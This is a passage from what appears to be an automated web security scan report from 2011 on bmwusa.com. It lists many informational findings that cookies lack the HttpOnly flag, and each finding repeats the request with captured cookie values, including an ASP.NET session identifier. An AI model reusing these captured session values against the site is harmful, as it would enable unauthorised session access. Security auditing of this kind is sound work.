The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/128iconvertible/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:43:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:03:02 GMT;path=/
Content-Length: 216182


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.162. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/1seriescoupemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/128icoupe/1seriescoupemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/128icoupe/1seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:22 GMT;path=/
Content-Length: 201997


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.163. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/128icoupe/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/128icoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:21 GMT;path=/
Content-Length: 213283


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.164. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/128icoupe/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/128icoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:23 GMT;path=/
Content-Length: 200122


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.165. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/128icoupe/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/128icoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:24 GMT;path=/
Content-Length: 214638


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.166. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/1seriesconvertiblemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/135iconvertible/1seriesconvertiblemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/135iconvertible/1seriesconvertiblemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:34 GMT;path=/
Content-Length: 202358


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.167. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/135iconvertible/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/135iconvertible/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:46:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:06:27 GMT;path=/
Content-Length: 213670


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.168. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/135iconvertible/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/135iconvertible/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:37 GMT;path=/
Content-Length: 225504


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.169. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/135iconvertible/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/135iconvertible/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:14 GMT;path=/
Content-Length: 216027


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.170. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/1seriescoupemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/135icoupe/1seriescoupemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/135icoupe/1seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:26 GMT;path=/
Content-Length: 201997


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.171. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/135icoupe/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/135icoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:26 GMT;path=/
Content-Length: 213259


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.172. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/135icoupe/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/135icoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:33 GMT;path=/
Content-Length: 225720


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.173. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/135icoupe/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/135icoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:25 GMT;path=/
Content-Length: 214974


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.174. http://www.bmwusa.com/standard/content/vehicles/2011/1/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:20 GMT;path=/
Content-Length: 200292


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.175. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/3seriesconvertiblemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328iconvertible/3seriesconvertiblemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

